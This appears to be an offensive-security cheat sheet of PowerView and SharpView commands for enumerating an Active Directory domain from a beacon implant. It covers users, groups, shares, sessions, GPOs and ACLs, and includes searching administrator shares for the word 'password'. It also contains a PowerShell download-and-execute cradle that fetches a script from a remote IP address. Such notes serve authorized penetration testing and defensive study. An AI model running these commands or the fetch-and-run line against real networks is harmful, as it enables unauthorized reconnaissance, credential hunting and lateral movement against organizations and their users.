PowerView

Enumeration

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# PowerView
IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/view.ps1');

# Domain Info
Get-Domain
Get-DomainController

# Password Policy
(Get-DomainPolicy)."SystemAccess"
Get-DomainPolicyData | select -ExpandProperty SystemAccess

# Enumerate Domain Users
Get-DomainUser | select samaccountname

# Enumerate Domain User Properties (the attribute name is pwdlastset; "pwnlastset" on the next line is a typo)
Get-DomainUser -Properties description,pwnlastset

# Get Detailed Information About Specific Domain User
Get-DomainUser -Identity user1

# Enumerate Domain Groups
Get-DomainGroup | select samaccountname

# Get Domain Groups Whose Name Contains The Word "admin"
Get-DomainGroup *admin* | select samaccountname

# Enumerate Domain Computers
Get-DomainComputer | select cn
Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName

# Enumerate Domain Computers That Respond To a Ping Request
Get-DomainComputer -Ping | select cn

# Enumerate Domain OUs
Get-DomainOU | select name

# Enumerate Domain Group Members
Get-DomainGroupMember -Identity "Domain Admins"

# Enumerate Nested Group Members (Recursive)
Get-DomainGroupMember -Identity "Domain Admins" -RecurseUsingMatchingRule | select groupname,membername,memberobjectclass

# Enumerate User Groups
Get-DomainGroup -UserName 'hsaad' | select samaccountname,memberof

Open Shares

# Enumerate Open Shares
Get-NetShare -ComputerName WorkStation1

# Enumerate Open Shares on All Domain Computers (Get-DomainComputer + Get-NetShare)
Find-DomainShare

# Enumerate Open Shares On Which The Current User Has Read Access
Find-DomainShare -CheckShareAccess

# Search For Interesting Files Inside Shares
Find-InterestingFile -Path \\workstation1\c$\

# Search For Interesting Keywords Inside Files On Shares
findstr /spin /c:"password" \\workstation1\c$\users\administrator\*.txt

# Find Interesting Domain Share Files (Get-DomainComputer + Get-NetShare + Find-InterestingFile)
Find-InterestingDomainShareFile -Verbose

Local Groups

# Enumerate Local Groups on Computer WorkStation1
Get-NetLocalGroup –ComputerName WorkStation1

# Enumerate Local Group Members Of Administrators Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Administrators"

# Enumerate Local Group Members Of Remote Desktop Users Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Remote Desktop Users"

# Enumerate Local Group Members on All Domain Computers (Get-DomainComputer + Get-NetLocalGroupMember)
Find-DomainLocalGroupMember -GroupName "Administrators"

Local Admin Access

# Test Admin Access Rights on a Computer
Test-AdminAccess -ComputerName workstation1

# Test Admin Access Rights on All Domain Computers (Get-DomainComputer + Test-AdminAccess)
Find-LocalAdminAccess -Verbose

User Hunting

# Enumerate Users Sessions (Reference: https://www.youtube.com/watch?v=q86VgM2Tafc)
Get-NetSession -ComputerName WorkStation1

# Enumerate LoggedOn Users
Get-NetLoggedon -ComputerName workstation1

# Get Domain Admins + Run Get-NetSession/Get-NetLoggedon on Every Domain Computer + Compare The Results
Find-DomainUserLocation

# Perform Against High-Traffic Servers Only (Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController)
Find-DomainUserLocation -Stealth

# Run Get-NetSession/Get-NetLoggedon on Every Domain Computer, Then Print All The Results
Find-DomainUserLocation -ShowAll

# Perform Against Different Users or Groups
Find-DomainUserLocation -UserGroupIdentity "local_admin"
Find-DomainUserLocation -UserIdentity "ITSupport"

Domain Group Policy

# Enumerate All Domain Group Policies
Get-DomainGPO | select DisplayName
Get-DomainGPO -Name "{AD7EE1ED-CDC8-4994-AE0F-50BA8B264829}" -Properties DisplayName

# Enumerate All Domain Group Policies Applied To This Computer
Get-DomainGPO -ComputerName WorkStation1

# Enumerate Local Admin Access Through Domain Group Policies
# Get-DomainGPO + Search For \SecEdit\GptTmpl.inf AND \Preferences\Groups\Groups.xml
Get-DomainGPOLocalGroup -Verbose

Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName

ACL

# Enumerate All The Domain ACLs For Non BuiltIn Users With Modification Access
Find-InterestingDomainAcl -ResolveGUIDs | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN 

SharpView

https://github.com/tevora-threat/SharpView

beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Debug\SharpView.exe Get-Domain
